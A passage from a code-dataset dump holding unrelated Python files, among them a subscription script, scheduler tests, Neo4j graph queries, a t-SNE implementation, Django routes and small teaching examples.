module_coverage=module_coverage)\n","sub_path":"Data Set/bug-fixing-1/d9c44897a61ad4252bf7cd07348e41d7de57824c--bug.py","file_name":"d9c44897a61ad4252bf7cd07348e41d7de57824c--bug.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"476309410","text":"#!/usr/bin/env python\n\nimport json\nimport argparse\nfrom httplib2 import Http\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n\ndef prep_json(callback_base_url, query_json_file, query_param_token, hmac_key_id, hmac_key, attachments_file):\n with open(query_json_file) as f:\n query = json.load(f)\n\n if hmac_key_id is not None:\n print('Subscribing with hmac key')\n payload = {\n 'es_query': query,\n 'callback_url': callback_base_url,\n 'hmac_key_id': hmac_key_id,\n 'hmac_secret_key': hmac_key\n }\n else:\n print('Subscribing with query param token')\n payload = {\n 'es_query': query,\n 'callback_url': '{0}?auth={1}'.format(callback_base_url, query_param_token)\n }\n\n if attachments_file:\n with open(attachments_file) as f:\n attachments = json.load(f)\n payload['attachments'] = attachments\n\n return payload\n\n\ndef make_request(js, dss_url, key_file):\n scopes = ['https://www.googleapis.com/auth/userinfo.email']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(key_file, scopes)\n h = credentials.authorize(Http())\n headers = {'Content-type': 'application/json'}\n response, content = h.request(dss_url, 'PUT', body=json.dumps(js), headers=headers)\n print(content)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-dss_url', help='Endpoint for creating new subscriptions in the storage service', required=True)\n parser.add_argument('-callback_base_url', help='Lira endpoint for receiving notifications', required=True)\n parser.add_argument('-key_file', help='JSON file containing storage service credentials', required=True)\n 
parser.add_argument('-query_json', help='JSON file containing the query to register', required=True)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-hmac_key', help='HMAC key')\n group.add_argument('-query_param_token', help='Query param auth token')\n parser.add_argument('-hmac_key_id', help='Unique identifier for hmac key')\n parser.add_argument(\"--additional_metadata\",\n required=False,\n default=None,\n help='JSON file with additional fields to include in the notification')\n args = parser.parse_args()\n if args.hmac_key and not args.hmac_key_id:\n parser.error('You must specify hmac_key_id when you specify hmac_key')\n\n js = prep_json(\n args.callback_base_url,\n args.query_json,\n args.query_param_token,\n args.hmac_key_id,\n args.hmac_key,\n args.additional_metadata\n )\n make_request(js, args.dss_url, args.key_file)\n","sub_path":"scripts/subscription-create.py","file_name":"subscription-create.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"158243040","text":"import shutil\nimport tempfile\n\nimport mock\nfrom testify import TestCase, setup, teardown\nfrom testify import assert_equal, run\nfrom tests.assertions import assert_call, assert_length\nfrom tests.testingutils import Turtle, autospec_method\n\nfrom tron import mcp\nfrom tron.config import config_parse\nfrom tron.serialize.runstate import statemanager\n\n\nclass MasterControlProgramTestCase(TestCase):\n\n TEST_CONFIG = 'tests/data/test_config.yaml'\n\n @setup\n def setup_mcp(self):\n self.working_dir = tempfile.mkdtemp()\n self.config_path = tempfile.mkdtemp()\n self.mcp = mcp.MasterControlProgram(\n self.working_dir, self.config_path)\n self.mcp.state_watcher = mock.create_autospec(\n statemanager.StateChangeWatcher)\n\n @teardown\n def teardown_mcp(self):\n self.mcp.nodes.clear()\n self.mcp.event_manager.clear()\n shutil.rmtree(self.config_path)\n 
shutil.rmtree(self.working_dir)\n\n def test_reconfigure(self):\n autospec_method(self.mcp._load_config)\n self.mcp.state_watcher = mock.MagicMock()\n self.mcp.reconfigure()\n self.mcp._load_config.assert_called_with(reconfigure=True)\n self.mcp.state_watcher.disabled.assert_called_with()\n\n def test_ssh_options_from_config(self):\n ssh_conf = mock.Mock(agent=False, identities=[])\n ssh_options = self.mcp._ssh_options_from_config(ssh_conf)\n\n assert_equal(ssh_options['agent'], False)\n assert_equal(ssh_options.identitys, [])\n # TODO: tests with agent and identities\n\n def test_graceful_shutdown(self):\n self.mcp.graceful_shutdown()\n for job_sched in self.mcp.get_jobs():\n assert job_sched.shutdown_requested\n\n def test_apply_config(self):\n config_container = mock.create_autospec(config_parse.ConfigContainer)\n master_config = config_container.get_master.return_value\n autospec_method(self.mcp._ssh_options_from_config)\n self.mcp.apply_config(config_container)\n self.mcp.state_watcher.update_from_config.assert_called_with(\n master_config.state_persistence)\n assert_equal(self.mcp.output_stream_dir, master_config.output_stream_dir)\n assert_equal(self.mcp.time_zone, master_config.time_zone)\n assert_equal(self.mcp.context.base, master_config.command_context)\n self.mcp._ssh_options_from_config.assert_called_with(\n master_config.ssh_options)\n\n def test_update_state_watcher_config_changed(self):\n self.mcp.state_watcher.update_from_config.return_value = True\n self.mcp.jobs = {'a': mock.Mock(), 'b': mock.Mock()}\n self.mcp.services = {'c': mock.Mock(), 'd': mock.Mock()}\n state_config = mock.Mock()\n self.mcp.update_state_watcher_config(state_config)\n self.mcp.state_watcher.update_from_config.assert_called_with(state_config)\n assert_equal(\n self.mcp.state_watcher.save_job.mock_calls,\n [mock.call(j.job) for j in self.mcp.jobs.itervalues()])\n assert_equal(\n self.mcp.state_watcher.save_service.mock_calls,\n [mock.call(s) for s in 
self.mcp.services.itervalues()])\n\n def test_update_state_watcher_config_no_change(self):\n self.mcp.state_watcher.update_from_config.return_value = False\n self.mcp.jobs = {'a': mock.Mock(), 'b': mock.Mock()}\n state_config = mock.Mock()\n self.mcp.update_state_watcher_config(state_config)\n assert not self.mcp.state_watcher.save_job.mock_calls\n\n\nclass MasterControlProgramRestoreStateTestCase(TestCase):\n\n @setup\n def setup_mcp(self):\n self.working_dir = tempfile.mkdtemp()\n self.config_file = tempfile.NamedTemporaryFile(\n dir=self.working_dir)\n self.mcp = mcp.MasterControlProgram(\n self.working_dir, self.config_file.name)\n self.mcp.jobs = {'1': Turtle(), '2': Turtle()}\n self.mcp.services = {'1': Turtle(), '2': Turtle()}\n\n @teardown\n def teardown_mcp(self):\n self.mcp.nodes.clear()\n self.mcp.event_manager.clear()\n shutil.rmtree(self.working_dir)\n\n def test_restore_state(self):\n def restore(jobs, services):\n state_data = {'1': 'things', '2': 'things'}\n return state_data, state_data\n self.mcp.state_watcher = Turtle(restore=restore)\n self.mcp.restore_state()\n for job in self.mcp.jobs.values():\n assert_call(job.restore_job_state, 0, 'things')\n for service in self.mcp.services.values():\n assert_call(service.restore_service_state, 0, 'things')\n\n def test_restore_state_no_state(self):\n def restore(jobs, services):\n return {}, {}\n self.mcp.state_watcher = Turtle(restore=restore)\n self.mcp.restore_state()\n for job in self.mcp.jobs.values():\n assert_length(job.restore_job_state.calls, 0)\n for service in self.mcp.services.values():\n assert_length(service.restore_service_state.calls, 0)\n\n def test_restore_state_partial(self):\n def restore(jobs, services):\n return {'1': 'thing'}, {'2': 'thing'}\n self.mcp.state_watcher = Turtle(restore=restore)\n self.mcp.restore_state()\n\n assert_call(self.mcp.jobs['1'].restore_job_state, 0, 'thing')\n assert_length(self.mcp.jobs['2'].restore_job_state.calls, 0)\n 
assert_length(self.mcp.services['1'].restore_service_state.calls, 0)\n assert_call(self.mcp.services['2'].restore_service_state, 0, 'thing')\n\nif __name__ == '__main__':\n run()\n","sub_path":"tests/mcp_test.py","file_name":"mcp_test.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"531110698","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nimageMatrix = np.fromfile('image2.bin', dtype=np.int16)\nn \t\t\t= int(np.sqrt(imageMatrix.size))\nim \t\t\t= plt.imshow(imageMatrix.reshape((n,n)), origin='lower')\nim.set_clim([0.0,200.0])\nim.set_cmap('afmhot')\nim.axes.get_xaxis().set_visible(False)\nim.axes.get_yaxis().set_visible(False)\nplt.savefig('contest_image.eps', format='eps', dpi=500)\n#plt.show()\n\n","sub_path":"assignment4/ArtContest/art.py","file_name":"art.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"638679966","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 19 09:45:13 2019\n\n@author: mgbriere\n\"\"\"\nimport sys,os,py2neo,csv\nimport numpy as np\nfrom py2neo import *\n\nID = 'neo4j'\npwd = '4jneo'\n\ngraph = Graph(\"bolt://localhost:7687\",auth=(ID, pwd))\n\n#clustering = louvain or markov\n# for the given rel_name, returns 2 values :\n # mean closeness for louvain (or markov) clusters\n # mean closeness with nb_support used by louvain (or markov) but before clustering (all patients)\ndef get_mean_centrality(cancer, rel_name, clustering):\n rel = \"[r:\" + rel_name + \"]\"\n if clustering == \"louvain\":\n cluster_nodes = \"(c:Community:\" + rel_name + \")\"\n clust_relation = \"[:FROM_COMMUNITY]\"\n elif clustering == \"markov\":\n cluster_nodes = \"(c:MarkovClust:\" + rel_name + \")\"\n clust_relation = \"[:FROM_MARKOV_CL]\"\n\n avg_clustering_centrality_query = \"MATCH \" + cluster_nodes + \" 
RETURN avg(c.avgClosenessCentrality)\"\n avg_clustering_centrality = float(graph.run(avg_clustering_centrality_query).to_series())\n \n nb_support_query = \"MATCH \" + cluster_nodes + \" RETURN DISTINCT c.nb_support\"\n nb_support = int(graph.run(nb_support_query).to_series())\n print(nb_support)\n avg_clustering_centrality_before_clust = get_closeness_before_clust(cancer, rel_name, nb_support)\n return(avg_clustering_centrality, avg_clustering_centrality_before_clust)\n \ndef get_closeness_before_clust(cancer, rel_name, nb_support):\n patients_nodes = \"(p:Patient:\" + cancer + \")\"\n p1_node = \"(p1:Patient:\" + cancer + \")\"\n p2_node = \"(p2:Patient:\" + cancer + \")\"\n rel = \"[r:\" + rel_name + \"]\"\n rel_condition = \"r.nb_support >=\" + str(nb_support)\n \n objects = 'MATCH ' + p1_node + '-' + rel + '-' + p2_node + ' WHERE ' + rel_condition + ' RETURN distinct id(p1) as id'\n condition = 'MATCH ' + p1_node + '-' + rel + '-' + p2_node + ' WHERE ' + rel_condition + ' RETURN id(p1) as source, id(p2) as target'\n \n closeness_query = \"CALL algo.closeness('\" + objects + \"', '\" + condition + \"',\\\n {graph:'cypher', write: true, writeProperty: 'tot_closeness_centrality'})\"\n graph.run(closeness_query)\n \n avg_closeness_query = 'MATCH ' + patients_nodes + '-' + rel + '-(p2) WHERE ' + rel_condition + ' RETURN avg(p.tot_closeness_centrality)'\n avg_closeness = float(graph.run(avg_closeness_query).to_series())\n \n return(avg_closeness)\n \ndef get_mean_clust_coeff(cancer, rel_name, clustering):\n rel = \"[r:\" + rel_name + \"]\"\n if clustering == \"louvain\":\n cluster_nodes = \"(c:Community:\" + rel_name + \")\"\n clust_relation = \"[:FROM_COMMUNITY]\"\n elif clustering == \"markov\":\n cluster_nodes = \"(c:MarkovClust:\" + rel_name + \")\"\n clust_relation = \"[:FROM_MARKOV_CL]\"\n\n avg_clust_coeff_query = \"MATCH \" + cluster_nodes + \" RETURN avg(c.avgClustCoeff)\"\n avg_clust_coeff = float(graph.run(avg_clust_coeff_query).to_series())\n \n 
nb_support_query = \"MATCH \" + cluster_nodes + \" RETURN DISTINCT c.nb_support\"\n nb_support = int(graph.run(nb_support_query).to_series())\n print(nb_support)\n avg_clust_coeff_before_clust = get_clust_coeff_before_clust(cancer, rel_name, nb_support)\n return(avg_clust_coeff, avg_clust_coeff_before_clust)\n\ndef get_clust_coeff_before_clust(cancer, rel_name, nb_support):\n patients_nodes = \"(p:Patient:\" + cancer + \")\"\n p1_node = \"(p1:Patient:\" + cancer + \")\"\n p2_node = \"(p2:Patient:\" + cancer + \")\"\n rel = \"[r:\" + rel_name + \"]\"\n rel_condition = \"r.nb_support >=\" + str(nb_support)\n \n objects = 'MATCH ' + p1_node + '-' + rel + '-' + p2_node + ' WHERE ' + rel_condition + ' RETURN distinct id(p1) as id'\n condition = 'MATCH ' + p1_node + '-' + rel + '-' + p2_node + ' WHERE ' + rel_condition + ' RETURN id(p1) as source, id(p2) as target'\n \n triangle_count_query = \"CALL algo.triangleCount('\" + objects + \"', '\" + condition + \"',\\\n {graph:'cypher', concurrency:4, write:true, writeProperty:'tot_triangles', clusteringCoefficientProperty:'tot_coefficient'}) \\\n YIELD loadMillis, computeMillis, writeMillis, nodeCount, triangleCount, averageClusteringCoefficient \\\n RETURN averageClusteringCoefficient\"\n avg_clust_coeff = float(graph.run(triangle_count_query).to_series())\n \n return(avg_clust_coeff)\n\n\n\n","sub_path":"dev/Neomics_Gala/graph_analysis/small_world_communities.py","file_name":"small_world_communities.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"102353916","text":"import numpy as np\nfrom timitate.utils.const import NEUTRAL_MINERAL_SET\nfrom timitate.utils.const import NEUTRAL_VESPENE_SET\n\n\nRESOURCE_DISTANCE = 7.0\n\ndef calculate_distances(x1, y1, x2, y2):\n x = abs(x1 - x2)\n y = abs(y1 - y2)\n distance = x ** 2 + y ** 2\n return distance ** 0.5\n\ndef unit_dist(unit1, unit2):\n return 
calculate_distances(unit1.pos.x, unit1.pos.y,\n unit2.pos.x, unit2.pos.y)\n\ndef min_dist(unit, mtags, gtags, all_minerals, all_gas):\n # minimal dist from unit to mtags and gtags\n d = [unit_dist(unit, all_minerals[tag]) for tag in mtags] + \\\n [unit_dist(unit, all_gas[tag]) for tag in gtags]\n return min(d)\n\ndef can_build_base(x, y, m_pos):\n for pos in m_pos:\n dx = abs(pos[0] - x)\n dy = abs(pos[1] - y)\n if dx < 6 and dy < 6 and (dx < 5 or dy < 5):\n return False\n return True\n\ndef find_ideal_base_position(m_pos, g_pos):\n mean_x, mean_y = m_pos.mean(0)\n max_x, max_y = g_pos.min(0) + 10\n min_x, min_y = g_pos.max(0) - 10\n d_min = None\n ideal_pos = []\n x = min_x\n while x <= max_x:\n y = min_y\n while y <= max_y:\n if can_build_base(x, y, m_pos):\n d = calculate_distances(x, y, mean_x, mean_y)\n if d_min is None or d < d_min:\n ideal_pos = [x, y]\n d_min = d\n y += 1\n x += 1\n return ideal_pos\n\ndef find_resource_area(mtags, gtags, all_minerals, all_gas):\n gtags_in_area = []\n tag = mtags.pop()\n mtags_in_area = [tag]\n while mtags: # not empty\n d_min = None\n mtag = None\n for tag in mtags:\n d = min_dist(all_minerals[tag], mtags_in_area,\n gtags_in_area, all_minerals, all_gas)\n if d_min is None or d < d_min:\n d_min = d\n mtag = tag\n if d_min > RESOURCE_DISTANCE:\n break\n mtags_in_area.append(mtag)\n mtags.discard(mtag)\n\n while gtags: # not empty\n d_min = None\n gtag = None\n for tag in gtags:\n d = min_dist(all_gas[tag], mtags_in_area,\n gtags_in_area, all_minerals, all_gas)\n if d_min is None or d < d_min:\n d_min = d\n gtag = tag\n if d_min > RESOURCE_DISTANCE:\n break\n gtags_in_area.append(gtag)\n gtags.discard(gtag)\n\n m_pos = [[all_minerals[tag].pos.x,\n all_minerals[tag].pos.y] for tag in mtags_in_area]\n g_pos = [[all_gas[tag].pos.x,\n all_gas[tag].pos.y] for tag in gtags_in_area]\n ideal_pos = find_ideal_base_position(np.array(m_pos),\n np.array(g_pos))\n return ideal_pos\n\ndef find_all_base_position(units):\n all_minerals = 
dict([(u.tag, u) for u in units\n if u.unit_type in NEUTRAL_MINERAL_SET])\n all_vespenes = dict([(u.tag, u) for u in units\n if u.unit_type in NEUTRAL_VESPENE_SET])\n mtags = set(all_minerals.keys())\n gtags = set(all_vespenes.keys())\n all_pos = []\n while len(mtags) > 0 and len(gtags) > 0:\n pos = find_resource_area(mtags, gtags, all_minerals, all_vespenes)\n all_pos.append(pos)\n return all_pos\n\n","sub_path":"agent_TLeagueFormal14/TImitate/timitate/utils/find_ideal_base_pos.py","file_name":"find_ideal_base_pos.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"402932402","text":"from cmath import e\nfrom typing import Union\nimport pandas as pd\nimport os\n\n\n\nclass Item:\n # NOTE: these are class attrs\n pay_rate = 0.8 # discount\n inventory = list()\n fpath = os.path.join(os.getcwd(), 'OOP_projects', 'data', 'items.csv')\n\n @staticmethod\n def validate_input(name: str, price: float, quantity: float) -> Union[bool, AssertionError]:\n assert price >=0 and quantity>=0, 'Price and quantity should be >= 0'\n\n @staticmethod\n def check_if_integer(num):\n \n # if float\n if isinstance(num, float):\n # if 7.0 it will return True, False if has fractional part\n return num.is_integer()\n # if int like 7\n elif isinstance(num, int):\n return True\n return False\n\n\n def __repr__(self) -> str:\n \"\"\"\n Display a single Item object\n \"\"\"\n # repr should be st it can be directly copied and used to create objs\n return f\"Item('{self.name}',{self.price},{self.quantity})\"\n\n def add_item_to_inventory(item):\n \"\"\"\n Add an item to the class attr inventory if not exists\n \"\"\"\n if item not in Item.inventory:\n Item.inventory.append(item)\n\n return\n\n def display_inventory():\n \"\"\"\n Displays each item in the inventory\n \"\"\"\n for item_ in Item.inventory:\n print (item_)\n return\n\n def __init__(self, name: str, price: float, quantity=0) -> None:\n\n 
Item.validate_input(name, price, quantity)\n\n self.name = name\n self.price = price\n self.quantity = quantity\n\n # add item to inventory now that it is created \n Item.add_item_to_inventory(self)\n\n def calculate_total_price(self) -> float:\n return self.price * self.quantity\n\n def apply_discount(self):\n self.price = self.price * self.pay_rate\n print (f'After Discount of {100-self.pay_rate*100}% price: {self.price}')\n\n \n\n # NOTE: this is a class method\n @classmethod\n def instantiate_from_csv(cls):\n \"\"\"\n Read a csv file and create instances for each record\n \"\"\"\n fpath = cls.fpath\n try:\n df = pd.read_csv(fpath, index_col=False)\n except FileNotFoundError as e:\n print (f'Not found file at {fpath}')\n raise\n\n records = df.to_dict(orient='list')\n\n for item_ in (list(zip(records['name'], records['price'], records['quantity']))):\n Item(name=item_[0], price=item_[1], quantity=item_[2])\n\n\n# item1 = Item(\"Phone\", 100, 1)\n# item2 = Item(\"Laptop\", 1000, 3)\n# item3 = Item(\"Cable\", 10, 5)\n# item4 = Item(\"Mouse\", 50, 5)\n# item5 = Item(\"Keyboard\", 75, 5)\n\n# Item.display_inventory()\n\nItem.instantiate_from_csv()\nprint(Item.inventory)\nItem.display_inventory()\n\n\nprint (Item.check_if_integer(9))","sub_path":"OOP_projects/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"322821729","text":"from sqlalchemy import func\n\nfrom dao.db import OracleDb\nfrom dao.orm.model import ormSchedule\n\n\nclass UserHelper:\n\n def __init__(self):\n self.db = OracleDb()\n\n def getVariable(self, group_name=None):\n\n if group_name:\n group_name = \"'{0}'\".format(group_name)\n else:\n group_name = 'null'\n\n query = \"select * from table(ORM_COUNT.GetCountData({0}))\".format(group_name)\n print(query)\n result = self.db.execute(query)\n return result.fetchall()\n\n\n\n def test(self):\n db = OracleDb()\n query1 = (\n 
db.sqlalchemy_session.query(\n ormSchedule.group_name,\n func.count(ormSchedule.group_name).label('skill_count')\n ). \\\n\n group_by(ormSchedule.group_name)\n ).all()\n print(query1)\n\n\n\n\nif __name__ == \"__main__\":\n\n helper = UserHelper()\n print(helper.getVariable('KM-63'))\n print(helper.test())","sub_path":"km-63/Канєвський/source/dao/myhelper.py","file_name":"myhelper.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"614373340","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/16 下午9:44\n# @Author : wonderstone\n# @FileName: deck_app.py\n# @Software: PyCharm\n# @Ref :\n\n\nfrom frenchdeck import FrenchDeck, Card\n\nbeer_card = Card('7', 'diamonds')\nprint(beer_card)\ndeck = FrenchDeck()\nprint(len(deck))\n # 52\n # deck[:3]\n # [Card(rank='2', suit='spades'), Card(rank='3', suit='spades'), Card(rank='4', suit='spades')]\n # >> > deck[12::13]\n # [Card(rank='A', suit='spades'), Card(rank='A', suit='diamonds'), Card(rank='A', suit='clubs'),\n # Card(rank='A', suit='hearts')]\n # >> > Card('Q', 'hearts') in deck\n # True\n # >> > Card('Z', 'clubs') in deck\n # False\n # >> > for card in deck: # doctest: +ELLIPSIS\n # ...\n # print(card)\n # Card(rank='2', suit='spades')\n # Card(rank='3', suit='spades')\n # Card(rank='4', suit='spades')\n # ...\n # >> > for card in reversed(deck): # doctest: +ELLIPSIS\n # ...\n # print(card)\n # Card(rank='A', suit='hearts')\n # Card(rank='K', suit='hearts')\n # Card(rank='Q', suit='hearts')\n # ...\n # >> > for n, card in enumerate(deck, 1): # doctest: +ELLIPSIS\n # ...\n # print(n, card)\n # 1\n # Card(rank='2', suit='spades')\n # 2\n # Card(rank='3', suit='spades')\n # 3\n # Card(rank='4', suit='spades')\n # ...\n # suit_values = dict(spades=3, hearts=2, diamonds=1, clubs=0)\n #\n #\n # def spades_high(card):\n # ...\n # rank_value = FrenchDeck.ranks.index(card.rank)\n #\n #\n # ...\n # return rank_value * 
len(suit_values) + suit_values[card.suit]\n #\n # Rank\n # test:\n #\n # >> > spades_high(Card('2', 'clubs'))\n # 0\n # >> > spades_high(Card('A', 'spades'))\n # 51\n #\n # >> > for card in sorted(deck, key=spades_high): # doctest: +ELLIPSIS\n # ...\n # print(card)\n # Card(rank='2', suit='clubs')\n # Card(rank='2', suit='diamonds')\n # Card(rank='2', suit='hearts')\n # ...\n # Card(rank='A', suit='diamonds')\n # Card(rank='A', suit='hearts')\n # Card(rank='A', suit='spades')","sub_path":"deck_app.py","file_name":"deck_app.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"217054561","text":"from Tkinter import *\n\nmaster = Tk()\n\nLabel(text=\"one\").pack()\n\nseparator = Frame(height=2, bd=1, relief=SUNKEN)\nseparator.pack(fill=X, padx=5, pady=5)\n\nLabel(text=\"two\").pack()\n\nmainloop()","sub_path":"Tkinter/separator.py","file_name":"separator.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"140385476","text":"\"\"\" File containing TSNE class \"\"\"\nimport numpy as np\nfrom numpy.random import normal\nimport matplotlib.pyplot as plt\n\nfrom src import util\n\n\nclass TSNE:\n \"\"\" Class for performing Student t-Distributed Stochastic Neighbor Embedding \"\"\"\n def __init__(self, filename):\n self.filename = filename\n self.raw = util.load_csv_to_array(filename)\n self.nr_data_points = self.raw.shape[0]\n self.hd_similarity_matrix = None # p as described in assignment\n\n def compute_pairwise_similarities(self, k):\n \"\"\"\n Computes pairwise similarities between the raw data points.\n Creates a new matrix filled with zeroes, except for at the\n indexes of the k+1 nearest points in the distance matrix, where\n the value is set to 1. 
Diagonal is then set to zero\n (in other words distance from point to itself is not included).\n\n Sets the hd_similarity_matrix of self to be the resulting matrix.\n \"\"\"\n self.hd_similarity_matrix = util.calculate_euclidean_distances(self.raw)\n self.hd_similarity_matrix = util.reduce_matrix(self.hd_similarity_matrix, k)\n\n self.hd_similarity_matrix = \\\n (self.hd_similarity_matrix + np.swapaxes(self.hd_similarity_matrix, 0, 1) > 0)\\\n .astype(float)\n\n def map_data_points(self, max_iteration, alpha, epsilon):\n \"\"\" Maps data points. \"\"\"\n\n # divide each point by sum of values\n stand_hd_similarity_matrix = self.hd_similarity_matrix / \\\n np.sum(self.hd_similarity_matrix) # P\n dynamic_stand_hd_similarity_matrix = 4 * stand_hd_similarity_matrix\n\n # Sample 2D data points from normal distribution\n sampled_two_d_points = normal(0, 10e-4, (2, self.nr_data_points))\n util.save_array_to_csv(sampled_two_d_points, \"sampled_2d_points.csv\")\n\n # Or load previously sampled 2D points for consistency\n sampled_two_d_points = util.load_csv_to_array(\"sampled_2d_points.csv\")\n\n # Initialize variables\n gain = np.ones((2, self.nr_data_points)) # g in assignment\n change = np.zeros((2, self.nr_data_points)) # delta in assignment\n dynamic_alpha = 0.5\n\n for i in range(1, max_iteration):\n print(\"Iteration \" + str(i))\n\n if i == 250:\n dynamic_alpha = alpha # Optimisation trick\n\n # Find similarity matrix of 2D points\n two_d_similarity_matrix = util.calculate_euclidean_distances(\n np.swapaxes(sampled_two_d_points, 0, 1))\n two_d_similarity_matrix = 1 / (\n 1 + np.square(two_d_similarity_matrix)) # q as described in assignment\n\n # divide each point by sum of values\n stand_two_d_similarity_matrix = two_d_similarity_matrix / \\\n np.sum(two_d_similarity_matrix) # Q\n\n if i == 100:\n dynamic_stand_hd_similarity_matrix = \\\n stand_hd_similarity_matrix # Optimisation trick\n\n capital_y = np.swapaxes(sampled_two_d_points, 0, 1)\n capital_g = 
(dynamic_stand_hd_similarity_matrix -\n stand_two_d_similarity_matrix) * two_d_similarity_matrix\n capital_s = np.diag(np.sum(capital_g, axis=1))\n gradient = 4 * (capital_s - capital_g) @ capital_y\n\n # print(gradient.shape)\n gradient = np.swapaxes(gradient, 0, 1)\n\n # Update gain\n gain[np.sign(gradient) != np.sign(change)] += 0.2\n gain[np.sign(gradient) == np.sign(change)] *= 0.8\n gain[gain < 0.01] = 0.01\n\n # Update change\n change = dynamic_alpha * change - epsilon * gain * gradient\n\n # Update 2D points\n sampled_two_d_points += change\n\n print(sampled_two_d_points)\n\n # Plotting mapped points\n if self.filename == \"digits.csv\":\n labels = util.load_csv_to_array(\"digits_label.csv\").tolist()\n points_to_plot = np.swapaxes(sampled_two_d_points, 0, 1)\n plt.scatter(points_to_plot[:, 0], points_to_plot[:, 1],\n c=labels, cmap='tab10', s=10, marker=\".\")\n cbar = plt.colorbar()\n cbar.set_label(\"Number labels\")\n else:\n plt.scatter(sampled_two_d_points[:, 0], sampled_two_d_points[:, 1],\n s=10, marker=\".\")\n plt.show()\n","sub_path":"src/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"130057866","text":"# Import Packages\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\n\nbmi = pd.read_csv('Datasets/BMI.csv')\n\nmodel = LinearRegression()\nmodel.fit(bmi[['BMI']], bmi[['Life expectancy']])\n\npredict_life = model.predict([[21.07931]])\nprint(predict_life)","sub_path":"59_DSND/02_Linear_Regression_Scikit.py","file_name":"02_Linear_Regression_Scikit.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"332063511","text":"from django.conf.urls import url\r\nfrom first_app import views\r\n\r\nurlpatterns=[\r\n url(r'^book_appointments/',views.book,name='book'),\r\n 
url(r'^show_appointments/',views.showapp,name='showapp'),\r\n url(r'^booked/',views.bookapp,name='bookapp'),\r\n url(r'^$',views.index,name='index'),\r\n\r\n\r\n]","sub_path":"first_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"374504159","text":"from django.conf.urls import url\nfrom . import views\n\n\napp_name = 'weather'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^baoshan/(\\w+)$', views.baoshan, name='baoshan'),\n url(r'^changning/(\\w+)$', views.changning, name='changning'),\n url(r'^chongming/(\\w+)$', views.chongming, name='chongming'),\n url(r'^fengxian/(\\w+)$', views.fengxian, name='fengxian'),\n url(r'^hongkou/(\\w+)$', views.hongkou, name='hongkou'),\n url(r'^huangpu/(\\w+)$', views.huangpu, name='huangpu'),\n url(r'^jiading/(\\w+)$', views.jiading, name='jiading'),\n url(r'^jinshan/(\\w+)$', views.jinshan, name='jinshan'),\n url(r'^jinan/(\\w+)$', views.jinan, name='jinan'),\n url(r'^minghang/(\\w+)$', views.minghang, name='minghang'),\n url(r'^pudong/(\\w+)$', views.pudong, name='pudong'),\n url(r'^nanhui/(\\w+)$', views.nanhui, name='nanhui'),\n url(r'^qingpu/(\\w+)$', views.qingpu, name='qingpu'),\n url(r'^songjiang/(\\w+)$', views.songjiang, name='songjiang'),\n url(r'^xuhui/(\\w+)$', views.xuhui, name='xuhui'),\n url(r'^yangpu/(\\w+)$', views.yangpu, name='yangpu'),\n\n]","sub_path":"weather/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"460309702","text":"import aiohttp\nimport asyncio\n\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36',\n }\n\n\ndef analysis_html(response):\n data_dict = {}\n html_string = response.decode('utf-8')\n dumps_list = 
